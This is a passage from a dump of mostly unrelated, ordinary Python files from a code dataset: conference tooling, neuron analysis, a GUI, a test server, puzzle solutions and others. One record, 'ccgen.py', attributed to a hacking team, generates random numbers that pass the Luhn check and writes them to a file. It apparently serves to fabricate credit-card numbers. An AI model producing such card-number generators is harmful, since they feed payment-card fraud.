correct and very familiar with the relevant literature',\n '2: The reviewer is fairly confident that the evaluation is correct',\n '1: The reviewer\\'s evaluation is an educated guess'\n ],\n 'required': True\n }\n }\n }\n\n review_parameters = {\n 'readers': ['everyone'],\n 'writers': [config.CONFERENCE_ID],\n 'signatures': [config.CONFERENCE_ID],\n 'process': os.path.join(os.path.dirname(__file__), '../process/officialReviewProcess.js'),\n 'duedate': 
config.REVIEW_TIMESTAMP,\n 'reply': review_reply,\n 'invitees': [paperGroup + '/Reviewers']\n }\n invite = openreview.Invitation(paperinv + '/Official_Review', **review_parameters)\n client.post_invitation(invite)\n print(invite.id)\n","sub_path":"venues/NIPS.cc/2018/Workshop/IRASL/python/create-review-invitations.py","file_name":"create-review-invitations.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78980637","text":"# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project\n# All rights reserved.\n#\n# This file is part of NeuroM \n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the copyright holder nor the names of\n# its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n'''Module for the detection of the cut plane'''\nimport logging\nimport operator\n\nimport numpy as np\nimport neurom as nm\n\nfrom neurom import viewer\nfrom neurom.core import Tree\nfrom neurom.core.dataformat import COLS\n\n\nL = logging.getLogger(__name__)\n\n\ndef _create_1d_distributions(points, bin_width):\n '''Create point histograms along each axis\n\n Parameters:\n points: a np.ndarray of points\n bin_width: the bin width\n\n Returns: a dict of the X, Y and Z 1D histograms'''\n min_, max_ = np.min(points, axis=0), np.max(points, axis=0)\n hist = dict()\n for i, plane in enumerate('XYZ'):\n # Two binnings with same spacing but different offsets\n # first is attached to min_[i], last is attached to max_[i]\n binning_first_slice = np.arange(min_[i], max_[i] + bin_width, bin_width)\n binning_last_slice = np.arange(max_[i], min_[i] - bin_width, -bin_width)[::-1]\n hist[plane] = (np.histogram(points[:, i], bins=binning_first_slice),\n np.histogram(points[:, i], bins=binning_last_slice))\n return hist\n\n\ndef _get_probabilities(hist):\n '''Returns -log(p) where p is the a posteriori probabilities of the observed values\n in the bins X min, X max, Y min, Y max, Z min, Z max\n\n Parameters:\n hist: a dict of the X, Y and Z 1D histograms\n\n Returns: a dict of -log(p) values'''\n def minus_log_p(mu):\n '''Compute -Log(p) where p is the a posteriori probability to 
observe 0 counts\n in bin given than the mean value was \"mu\":\n The number of counts follows a Poisson law so the result is simply... mu\n demo: p(k|mu) = exp(-mu) * mu**k / k!\n p(0|mu) = exp(-mu)\n -log(p) = mu\n '''\n return mu\n\n for plane, (left, right) in hist.items():\n yield plane, 0, minus_log_p(left[0][0]), left\n yield plane, -1, minus_log_p(right[0][-1]), right\n\n\ndef _get_cut_leaves(neuron, cut_plane_and_position, tolerance):\n '''Returns leaves within cut plane tolerance'''\n cut_plane, position = cut_plane_and_position\n leaves = np.array([leaf.points[-1, COLS.XYZ]\n for neurite in neuron.neurites\n for leaf in nm.iter_sections(neurite, iterator_type=Tree.ileaf)])\n idx = 'XYZ'.find(cut_plane)\n return leaves[np.abs(leaves[:, idx] - position) < tolerance]\n\n\ndef draw_neuron(neuron, cut_plane_position, cut_leaves=None):\n '''Draw the neuron in the xy, yz and xz planes.\n\n Parameters:\n neuron: a Neuron\n cut_plane_position: a tuple (plane, position) like ('Z', 27)\n that can be specified to add the cut plane on\n the relevant plots\n cut_leaves: leaves to be highlighted by blue circles\n '''\n figures = dict()\n for draw_plane in ['yz', 'xy', 'xz']:\n fig, axes = viewer.draw(neuron, plane=draw_plane)\n figures[draw_plane] = (fig, axes)\n\n if cut_leaves is not None:\n import matplotlib\n slice_index = {'yz': [1, 2], 'xy': [0, 1], 'xz': [0, 2]}\n for point in cut_leaves:\n point_2d = point[slice_index[draw_plane]]\n axes.add_artist(matplotlib.patches.Circle(point_2d, radius=2))\n\n if cut_plane_position:\n cut_plane, position = cut_plane_position\n for axis, line_func in zip(draw_plane, ['axvline', 'axhline']):\n if axis == cut_plane.lower():\n getattr(axes, line_func)(position)\n return figures\n\n\ndef draw_dist_1d(hist, cut_position=None):\n '''Draw the 1D histograms, optionally also drawing a vertical line at cut_position'''\n import matplotlib.pyplot as plt\n fig = plt.figure()\n\n h, bins = hist\n plt.hist(bins[:-1], bins=bins, weights=h, label='Point distribution')\n plt.xlabel('Coordinate')\n plt.ylabel('Number of points')\n\n if cut_position:\n plt.gca().axvline(cut_position, color='r', label='Cut plane')\n plt.legend()\n return {'distrib_1d': (fig, plt.gca())}\n\n\ndef _get_status(minus_log_p):\n '''Returns ok if the probability that there is a cut plane is high enough'''\n _THRESHOLD = 50\n if minus_log_p < _THRESHOLD:\n return 'The probability that there is in fact NO cut plane is high: -log(p) = {0} !'\\\n .format(minus_log_p)\n return 'ok'\n\n\ndef find_cut_plane(neuron, bin_width=10, display=False):\n \"\"\"Find the cut plane\n\n Parameters:\n neuron: a Neuron object\n bin_width: The size of the binning\n display: where or not to display the control plots\n Note: It is the user responsability to call matplotlib.pyplot.show()\n\n Returns:\n A dictionary with the following items:\n status: 'ok' if everything went write, else an informative string\n cut_plane: a tuple (plane, position) where 'plane' is 'X', 'Y' or 'Z'\n and 'position' is the position\n cut_leaves: an np.array of all termination points in the cut plane\n figures: if 'display' option was used, a dict where values are tuples (fig, ax)\n for each figure\n details: A dict currently only containing -LogP of the bin where the cut plane was found\n\n 1) The distribution of all points along X, Y and Z is computed\n and put into 3 histograms.\n\n 2) For each histogram we look at the first and last empty bins\n (ie. 
the last bin before the histogram starts rising,\n and the first after it reaches zero again). Under the assumption\n that there is no cut plane, the posteriori probability\n of observing this empty bin given the value of the not-empty\n neighbour bin is then computed.\n 3) The lowest probability of the 6 probabilities (2 for each axes)\n corresponds to the cut plane\"\"\"\n\n points = np.array([point\n for neurite in (neuron.neurites or [])\n for section in nm.iter_sections(neurite)\n for point in section.points])\n if not points.size:\n return {'cut_leaves': None, 'status': \"Empty neuron\", 'cut_plane': None, 'details': None}\n\n hist = _create_1d_distributions(points, bin_width)\n\n cut_plane, side, minus_log_p, histo = max(_get_probabilities(hist), key=operator.itemgetter(2))\n\n cut_position = histo[1][side]\n cut_leaves = _get_cut_leaves(neuron, (cut_plane, cut_position), bin_width)\n\n result = {'cut_leaves': cut_leaves,\n 'status': _get_status(minus_log_p),\n 'details': {'-LogP': minus_log_p},\n 'cut_plane': (cut_plane, cut_position)}\n\n if display:\n result['figures'] = dict()\n result['figures'].update(draw_neuron(neuron, (cut_plane, cut_position), cut_leaves))\n result['figures'].update(draw_dist_1d(histo, cut_position))\n L.info('Trigger the plot display with: matplotlib.pyplot.show()')\n\n return result\n","sub_path":"neurom/apps/cut_plane_detection.py","file_name":"cut_plane_detection.py","file_ext":"py","file_size_in_byte":8607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232242713","text":"import sys\n\nimport fire\n\nfrom deep_daze import Imagine\n\n\ndef train(\n text=None,\n img=None,\n learning_rate=1e-5,\n num_layers=16,\n batch_size=4,\n gradient_accumulate_every=4,\n epochs=20,\n iterations=1050,\n save_every=100,\n image_width=512,\n deeper=False,\n overwrite=False,\n save_progress=True,\n seed=None,\n open_folder=True,\n save_date_time=False,\n start_image_path=None,\n start_image_train_iters=50,\n theta_initial=None,\n theta_hidden=None,\n start_image_lr=3e-4,\n lower_bound_cutout=0.1,\n upper_bound_cutout=1.0,\n saturate_bound=False,\n create_story=False,\n story_start_words=5,\n story_words_per_epoch=5,\n save_gif=False\n):\n \"\"\"\n :param text: (required) A phrase less than 77 characters which you would like to visualize.\n :param img: The path to a jpg or png image which you would like to imagine. Can be combined with text.\n :param learning_rate: The learning rate of the neural net.\n :param num_layers: The number of hidden layers to use in the Siren neural net.\n :param batch_size: The number of generated images to pass into Siren before calculating loss. Decreasing this can lower memory and accuracy.\n :param gradient_accumulate_every: Calculate a weighted loss of n samples for each iteration. 
Increasing this can help increase accuracy with lower batch sizes.\n :param epochs: The number of epochs to run.\n :param iterations: The number of times to calculate and backpropagate loss in a given epoch.\n :param save_progress: Whether or not to save images generated before training Siren is complete.\n :param save_every: Generate an image every time iterations is a multiple of this number.\n :param open_folder: Whether or not to open a folder showing your generated images.\n :param overwrite: Whether or not to overwrite existing generated images of the same name.\n :param deeper: Uses a Siren neural net with 32 hidden layers.\n :param image_width: The desired resolution of the image.\n :param seed: A seed to be used for deterministic runs.\n :param save_date_time: Save files with a timestamp prepended e.g. `%y%m%d-%H%M%S-my_phrase_here.png`\n :param start_image_path: Path to the image you would like to prime the generator with initially\n :param start_image_train_iters: Number of iterations for priming, defaults to 50\n :param theta_initial: Hyperparameter describing the frequency of the color space. Only applies to the first layer of the network.\n :param theta_hidden: Hyperparameter describing the frequency of the color space. Only applies to the hidden layers of the network.\n :param start_image_lr: Learning rate for the start image training.\n :param upper_bound_cutout: The upper bound for the cutouts used in generation.\n :param lower_bound_cutout: The lower bound for the cutouts used in generation.\n :param saturate_bound: If True, the LOWER_BOUND_CUTOUT is linearly increased to 0.75 during training.\n :param create_story: Creates a story by optimizing each epoch on a new sliding-window of the input words. If this is enabled, much longer texts than 77 chars can be used. Requires save_progress to visualize the transitions of the story.\n :param story_start_words: Only used if create_story is True. How many words to optimize on for the first epoch.\n :param story_words_per_epoch: Only used if create_story is True. How many words to add to the optimization goal per epoch after the first one.\n :param save_gif: Only used if save_progress is True. Saves a GIF animation of the generation procedure using the saved frames.\n \"\"\"\n # Don't instantiate imagine if the user just wants help.\n if any(\"--help\" in arg for arg in sys.argv):\n print(\"Type `imagine --help` for usage info.\")\n sys.exit()\n\n num_layers = 32 if deeper else num_layers\n\n imagine = Imagine(\n text=text,\n img=img,\n lr=learning_rate,\n num_layers=num_layers,\n batch_size=batch_size,\n gradient_accumulate_every=gradient_accumulate_every,\n epochs=epochs,\n iterations=iterations,\n image_width=image_width,\n save_every=save_every,\n save_progress=save_progress,\n seed=seed,\n open_folder=open_folder,\n save_date_time=save_date_time,\n start_image_path=start_image_path,\n start_image_train_iters=start_image_train_iters,\n theta_initial=theta_initial,\n theta_hidden=theta_hidden,\n start_image_lr=start_image_lr,\n lower_bound_cutout=lower_bound_cutout,\n upper_bound_cutout=upper_bound_cutout,\n saturate_bound=saturate_bound,\n create_story=create_story,\n story_start_words=story_start_words,\n story_words_per_epoch=story_words_per_epoch,\n save_gif=save_gif\n )\n\n print('Starting up...')\n if not overwrite and imagine.filename.exists():\n answer = input('Imagined image already exists, do you want to overwrite? 
(y/n) ').lower()\n if answer not in ('yes', 'y'):\n sys.exit()\n\n imagine()\n\n\ndef main():\n fire.Fire(train)\n","sub_path":"deep_daze/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294350084","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nfrom django.views.decorators.csrf import csrf_exempt\napp_name='authentication'\n\nurlpatterns = [\n path('login/',views.Login.as_view(), name='login'),\n path('logout/',views.Logout.as_view(), name='logout'),\n path('signup/',views.signup, name='signup'),\n path('reset/',views.reset, name='reset'),\n path('valid-email/',csrf_exempt(views.ValidateEmail.as_view())),\n path('valid-username/',csrf_exempt(views.ValidateUsername.as_view())),\n path('activate//',views.activate.as_view(),name=\"activate\")\n]","sub_path":"authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"465074804","text":"from gpanel import *\n\ndef drawStone(x, y):\n setColor(getRandomX11Color())\n move(x + size/2, y + size/2)\n fillRectangle(size, size)\n\nmakeGPanel(0, 400, 0, 400)\n\nsize = 50\n\nfor x in range(0, 400, size):\n for y in range(0, 400, size):\n drawStone(x, y) \n\n","sub_path":"tigerjython/TJExamples/03-Gr/Gp3b.py","file_name":"Gp3b.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66880431","text":"import sys\nimport threading\nimport cv2\nfrom PyQt4 import QtGui,QtCore\nfrom serCOM import *\nfrom time import sleep\nfrom chesster import Chesster\n\nclass Window(QtGui.QMainWindow):\n def __init__(self,):\n super(Window,self).__init__()\n self.busy=False\n self.dA=False\n self.dB=False\n self.on=False\n self.w=800\n self.h=480\n self.im_queue=0\n## titulo\n self.label('Chess-ter',size=(self.w,60),frame=\"white\")\n## info secuencias\n self.label('Controles',size=(150,30),pos=(25,60))\n fr1=self.frame(size=(150,370) ,pos=(25,90))\n btt1=self.btn('Nuevo Juego',self.iniciar,size=(120,50),pos=(40,100))\n btt2=self.btn('Calibrar',self.calibrar,size=(120,50),pos=(40,150))\n btt3=self.btn('Jugar',self.jugar,size=(120,50),pos=(40,200))\n btt4=self.btn('Finalizar',self.rep,size=(120,50),pos=(40,250))\n btt5=self.btn('Salir',self.fin,size=(120,50),pos=(40,300))\n self.label('Imagen',size=(350,30),pos=(225,70))\n self.imv=self.label(size=(350,350) ,pos=(225,100),frame='-')\n self.label('Representacion',size=(150,30),pos=(625,70))\n \n \n self.setGeometry(50,50,self.w,self.h)\n self.setWindowTitle('Chess-ter 1')\n self.conecta()\n## self.showFullScreen()\n self.show()\n \n \n \n def frame(self,size=0,pos=0):\n frm=QtGui.QFrame(self)\n if size!=0:\n frm.resize(size[0],size[1])\n if pos!=0: \n frm.move(pos[0],pos[1])\n frm.setFrameShape(QtGui.QFrame.Box)\n frm.setFrameShadow(QtGui.QFrame.Sunken)\n return frm\n def label(self,txt=0,size=0,pos=0,frame=0):\n if frame!=0: \n lfr=self.frame(size,pos)\n if frame!='-':\n stl=\"QFrame { background-color:\"+frame+\"}\"\n lfr.setStyleSheet(stl)\n if txt!=0:\n lbl=QtGui.QLabel(txt,self)\n else:\n lbl=QtGui.QLabel(self)\n if size!=0:\n lbl.resize(size[0],size[1])\n if pos!=0: \n lbl.move(pos[0],pos[1])\n return lbl\n \n def btn(self,name,funct,size=0,pos=0):\n btn=QtGui.QPushButton(name,self)\n btn.clicked.connect(funct)\n if size!=0:\n 
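Aside on the deep_daze CLI sample completed just above: fire.Fire(train) exposes every keyword argument of train as a command-line flag, which is why the long parameter list doubles as the CLI surface. A minimal, self-contained sketch of the same pattern; the train stub below is purely illustrative, not deep_daze's real trainer:

import fire

def train(text=None, epochs=20, deeper=False):
    # Illustrative stub: shows how python-fire maps flags onto keyword arguments.
    num_layers = 32 if deeper else 16
    print(f"text={text!r} epochs={epochs} num_layers={num_layers}")

if __name__ == '__main__':
    # Invoked e.g. as: python cli_sketch.py --text "a dream" --deeper
    fire.Fire(train)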
btn.resize(size[0],size[1])\n if pos!=0:\n btn.move(pos[0],pos[1])\n return btn\n def combo(self,items,size=0,pos=0):\n cbx=QtGui.QComboBox(self)\n if type(items)==tuple:\n for i in range(len(items)):\n cbx.addItem(items[i])\n else:\n cbx.addItem(items[i])\n if size!=0:\n cbx.resize(size[0],size[1])\n if pos!=0:\n cbx.move(pos[0],pos[1])\n cbx.activated[str].connect(self.com_fun)\n return cbx\n def conecta(self):\n print('Conectar')\n if not(self.dA):\n (self.SerA,self.dA)=conectarA()\n if self.dA:\n print('Ca')\n Ca=threading.Thread(name='sa',target=self.conA)\n Ca.start()\n \n if not(self.dB):\n (self.SerB,self.dB)=conectarB()\n if self.dB:\n print('cb')\n Cb=threading.Thread(name='sb',target=self.conB)\n Cb.start()\n def conB(self):\n self.dB=on_B()\n while self.dB==True:\n self.lMb.setText(\"activo\")\n self.fMb.setStyleSheet(\"QFrame { background-color: Green }\" ) \n self.dB=on_B()\n self.lMb.setText(\"inactivo\")\n self.fMb.setStyleSheet(\"QFrame { background-color: Red }\" )\n def conA(self):\n self.dA=on_A()\n while self.dA==True:\n self.lMa.setText(\"activo\")\n self.fMa.setStyleSheet(\"QFrame { background-color: Green }\" ) \n self.dA=on_A()\n self.lMa.setText(\"inactivo\")\n self.fMa.setStyleSheet(\"QFrame { background-color: Red }\" )\n def print_im(self,imc):\n sh=imc.shape\n h=sh[0]\n w=sh[1]\n if len(sh)==3:\n c=sh[2]\n bpl=3*w\n qimc=QtGui.QImage(imc.data,w,h,bpl,QtGui.QImage.Format_RGB888)\n qpix=QtGui.QPixmap()\n qpix.convertFromImage(qimc)\n self.imv.setPixmap(qpix.scaledToHeight(350))\n def iniciar(self):\n if not(self.on):\n self.player=Chesster(bright=55,sharp=100,contrast=100)\n## self.player.preview(2)\n \n def calibrar(self): \n print('calibrar')\n im=self.player.captura()\n imc=self.player.calibracion(im)\n print(imc.shape)\n self.im_queue=imc\n self.print_im(imc)\n def jugar(self):\n print('recon')\n im=self.player.captura()\n (q,b,c,imc)=self.player.get_board(1)\n print(imc.shape)\n print(b)\n print(q)\n self.im_queue=imc\n self.print_im(cv2.merge((imc,imc,imc))) \n def rep(self):\n del self.player\n print(\"rep\")\n def fin(self):\n sys.exit(self)\n\ndef main():\n app=QtGui.QApplication(sys.argv)\n GUI=Window()\n sys.exit(app.exec_())\n \n \ngui=threading.Thread(name='gui',target=main)\ngui.start()\n","sub_path":"tesis/Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"303123302","text":"#!/usr/bin/env python\n\n# Copyright (C) 2012 Eric J. Suh\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n'''Serve static files with a tunable simulated network delay. Useful for\ndeveloping web apps that can handle network degradation with grace.\n\nServes files from the current directory.'''\n\nimport sys\nimport os\nimport argparse\nimport random\nimport time\nimport threading\nimport socket\n\ntry: # Python 3.x\n from urllib.parse import unquote\n from http.server import SimpleHTTPRequestHandler\n from socketserver import ThreadingTCPServer\nexcept ImportError: # Python 2.7.x\n from urllib import unquote\n from SimpleHTTPServer import SimpleHTTPRequestHandler\n from SocketServer import ThreadingTCPServer\n\ndef get_request_handler_class(delay_min, delay_max, srvpath=None):\n '''Returns a subclass of SimpleHTTPRequestHandler that will add delays\n and serve from a different directory.'''\n if srvpath is None:\n srvpath = '.'\n\n class RequestHandler(SimpleHTTPRequestHandler, object):\n def handle(self):\n delay = random.randint(delay_min, delay_max)\n print('Delaying {} ms'.format(delay))\n time.sleep(float(delay)/1000.0)\n super(RequestHandler, self).handle()\n\n def translate_path(self, path):\n path = path.split('?',1)[0].split('#',1)[0]\n path = os.path.normpath(unquote(path))\n words = path.split('/')\n words = filter(None, words)\n path = os.path.abspath(srvpath)\n for word in words:\n word = os.path.splitdrive(word)[1]\n word = os.path.split(word)[1]\n if word in (os.curdir, os.pardir): continue\n path = os.path.join(path, word)\n return path\n\n return RequestHandler\n\n\nclass SoftserveTCPServer(ThreadingTCPServer, object):\n allow_reuse_address = True\n\n def handle_error(self, request, client_address):\n etype, evalue, etrace = sys.exc_info()\n if (evalue is not None\n and isinstance(evalue, socket.error)\n and evalue.errno == 32):\n pass # Just means a connection closed early\n else:\n super(SoftserveTCPServer, self).handle_error(request,\n client_address)\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--port', type=int, default=8000,\n help='port on which to serve files (default: %(default)s)')\n parser.add_argument('--min', type=int, default=1000,\n help='minimum delay in milliseconds (default: %(default)s)')\n parser.add_argument('--max', type=int, default=5000,\n help='maximum delay in milliseconds (default: %(default)s)')\n parser.add_argument('path', default='.', nargs='?', metavar='PATH',\n help='path relative to which to serve files (default: %(default)s)')\n\n args = parser.parse_args(argv)\n\n if (args.max < args.min):\n sys.stderr.write('Error: minimum delay must be less than maximum '\n 'delay\\n')\n return 1\n\n random.seed()\n\n Handler = get_request_handler_class(args.min, args.max, args.path)\n httpd = SoftserveTCPServer((\"localhost\", args.port), Handler)\n server_thread = threading.Thread(target=httpd.serve_forever)\n server_thread.start()\n\n print('Softserving files from {} on port {}. 
'\n          'Type Ctrl-C to exit.'.format(args.path, args.port))\n    try:\n        while server_thread.is_alive():\n            pass\n    except KeyboardInterrupt:\n        pass\n    finally:\n        print('\\nShutting down Softserve.')\n        httpd.shutdown()\n        httpd.server_close()\n        print('Goodbye!')\n\n    return 0\n\nif __name__ == '__main__':\n    sys.exit(main())\n","sub_path":"softserve.py","file_name":"softserve.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"2758174","text":"from typing import List\n\nclass Solution:\n    def makeConnected(self, n: int, connections: List[List[int]]) -> int:\n        l = len(connections)\n        # Fewer than n-1 cables can never connect n computers.\n        if l < n - 1:\n            return -1\n        # Group the computers into connected components.\n        groups = []\n        for a, b in connections:  # loop vars renamed from m, n: n shadowed the parameter\n            hit = [k for k, grp in enumerate(groups) if a in grp or b in grp]\n            if not hit:\n                groups.append({a, b})\n            else:\n                # Merge every component this cable touches (the original only\n                # appended to the first matching group, so components never merged,\n                # and it indexed the list with groups(k) instead of groups[k]).\n                merged = set().union(*(groups[k] for k in hit)) | {a, b}\n                groups = [grp for k, grp in enumerate(groups) if k not in hit]\n                groups.append(merged)\n        # Computers that appear in no connection are components of their own.\n        isolated = n - len(set().union(*groups)) if groups else n\n        return len(groups) + isolated - 1\n\n# instantiate the class; the bare function call in the original raised NameError\nprint(Solution().makeConnected(n=6, connections=[[0,1],[0,2],[0,3],[1,2],[1,3]]))","sub_path":"parlai/agents/hred/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"31310747","text":"# author: DedSecTL/Gameye98\n# team: BlackHole Security\n# sample script for luhn algorithm\nimport random\n\ng = \"\\x1b[1;32m\" # green color format\nn = \"\\x1b[0m\" # normal color format\n\nresult = []\nf = open(\"result.txt\",\"w\")\nwhile True:\n\tif len(result) > 10: break\n\tx = 0\n\tnvar = 0\n\tnum = []\n\tnum_n = []\n\tnum_s = []\n\tfor i in range(random.randrange(13, 17)):\n\t\tnum.append(random.randrange(0,10))\n\tfor num_x in num[:len(num)-1][::-1]:\n\t\tif x == 0:\n\t\t\tnum_xx = num_x * 2\n\t\t\tif num_xx > 9:\n\t\t\t\tnum_xx = num_xx % 10 + 1\n\t\t\tnum_n.append(num_xx)\n\t\t\tx = 1\n\t\telif x == 1:\n\t\t\tnum_n.append(num_x)\n\t\t\tx = 0\n\tfor d in num: num_s.append(str(d))  # loop var renamed from n: it clobbered the ANSI reset code above\n\tfor d in num_n: nvar += d\n\tif int(str(nvar * 9)[-1]) == num[-1]:\n\t\tprint(f\"{g}{''.join(num_s)}{n}\")\n\t\tf.write(\"\".join(num_s)+\"\\n\")\n\t\tresult.append(\"\".join(num_s))\n","sub_path":"ccgen.py","file_name":"ccgen.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"242855288","text":"#!/usr/bin/env python\n\"\"\"\n    Dummy AMQ producer to test the Kepler service\n\"\"\"\nimport json\nimport argparse\nimport os\nfrom sns_utilities.amq_connector.amq_consumer import Client\nfrom camm_amq.configuration import Configuration\nimport time\n\n# Setup the AMQ client\nconf = Configuration('/etc/kepler_consumer.conf')\nc = Client(conf.brokers, conf.amq_user, conf.amq_pwd)\n\n# Parse command arguments\nparser = argparse.ArgumentParser(description='Dummy Kepler workflow')\nparser.add_argument(conf.kepler_result_queue_flag, metavar='return_queue',\n                    default='DAKOTA.RESULTS.TEST',\n                    help='AMQ queue to send results to',\n                    dest='return_queue')\nparser.add_argument(conf.kepler_work_dir_flag, metavar='working_dir',\n                    default='/tmp',\n                    help='Dakota working directory',\n                    dest='working_dir')\nparser.add_argument(conf.kepler_output_file_flag, metavar='output_file',\n                    default='results.out',\n                    help='Kepler output file',\n                    dest='output_file')\nparser.add_argument('-runwf', metavar='workflow',\n                    default='Strategist.xml',\n                    help='Kepler workflow',\n                    dest='workflow')\nparser.add_argument('-nogui',\n                    action='store_true',\n                    help='gui option (dummy)',\n                    dest='nogui')\nnamespace = parser.parse_args()\n\n# Write dummy results 
file\nvalue = 123.456\noutput_file_path = os.path.join(namespace.working_dir, namespace.output_file)\n\n# Fake short computation time\ntime.sleep(5)\n\n# Send a simple message to the return queue\nmessage = {'params': 'test',\n           'output_file': output_file_path,\n           'cost_function': value\n           }\njson_message = json.dumps(message)\nc.send(destination='/queue/'+namespace.return_queue, message=json_message)\nc._disconnect()\n","sub_path":"activemq/test/dummy_kepler_workflow.py","file_name":"dummy_kepler_workflow.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"267781209","text":"\"\"\"\nRecipes available to data with tags ['GMOS', 'CAL', 'DARK'].\nDefault is \"makeProcessedDark\".\n\"\"\"\nrecipe_tags = {'GMOS', 'CAL', 'DARK'}\n\nfrom geminidr.gmos.recipes.sq.recipes_common import makeIRAFCompatible\n\n\ndef makeProcessedDark(p):\n    \"\"\"\n    This recipe performs the standardization and corrections needed to convert\n    the raw input dark images into a single stacked dark image. This output\n    processed dark is stored on disk using storeProcessedDark and has a name\n    equal to the name of the first input dark image with \"_dark.fits\" appended.\n\n    Parameters\n    ----------\n    p : PrimitivesBASE object\n        A primitive set matching the recipe_tags.\n    \"\"\"\n\n    p.prepare()\n    p.addDQ(add_illum_mask=False)\n    p.addVAR(read_noise=True)\n    p.overscanCorrect()\n    p.biasCorrect()\n    p.ADUToElectrons()\n    p.addVAR(poisson_noise=True)\n    # Force \"varclip\" due to large number of CRs\n    p.stackDarks(reject_method=\"varclip\")\n    p.makeIRAFCompatible()\n    p.storeProcessedDark()\n    return\n\n\n_default = makeProcessedDark\n","sub_path":"geminidr/gmos/recipes/sq/recipes_DARK.py","file_name":"recipes_DARK.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"466624054","text":"#!/usr/bin/env python2\n\nf = open('B-large.in')\n\nUP = '+'\nDOWN = '-'\n\ntestcases = int(f.readline().strip())\n\ndef flip(pancakes, stop):\n    pancakes[0:stop] = (UP if c == DOWN else DOWN for c in reversed(pancakes[0:stop]))\n\ndef removeend(pancakes):\n    while pancakes and pancakes[-1] == UP:\n        pancakes.pop()\n\ndef merge(pancakes):\n    i = 0\n    while i < len(pancakes)-1:\n        if pancakes[i] == pancakes[i+1]:\n            pancakes.pop(i)\n        else:\n            i += 1\n\nfor testcase in xrange(testcases):\n    pancakes = list(f.readline().strip())\n\n    moves = 0\n\n    merge(pancakes)\n    removeend(pancakes)\n\n    moves = len(pancakes)\n    print (\"Case #%s: %s\" % (testcase+1, moves))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_RasmusWL_pancake.py","file_name":"16_0_2_RasmusWL_pancake.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"120728752","text":"try:\n    number = float(input(\"Enter number\\n\"))\n    if number > 0:\n        rub = int(number)\n        kop = round((number - rub) * 100)  # round, not int: int() truncates float error (e.g. 1.10 gave 9 